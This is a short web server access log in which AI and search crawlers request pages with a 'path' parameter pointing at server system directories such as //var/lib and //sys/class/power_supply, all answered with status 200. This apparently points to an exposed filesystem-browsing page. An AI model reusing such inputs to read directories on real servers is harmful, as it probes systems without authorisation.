74.7.227.14 - - [04/Nov/2025:06:20:30 +1000] "GET /1233120?path=//var/lib HTTP/1.0" 200 59851 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
50.19.221.48 - - [04/Nov/2025:06:20:29 +1000] "GET /228203712?path=//opt/php71/lib HTTP/1.0" 200 14073 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
98.83.177.42 - - [04/Nov/2025:06:20:31 +1000] "GET /228203712?path=//sys/class/power_supply HTTP/1.0" 200 14122 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:06:20:32 +1000] "GET /891915408?shopdetail=0890864468 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.56.163.85 - - [04/Nov/2025:06:20:32 +1000] "GET /gambar/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
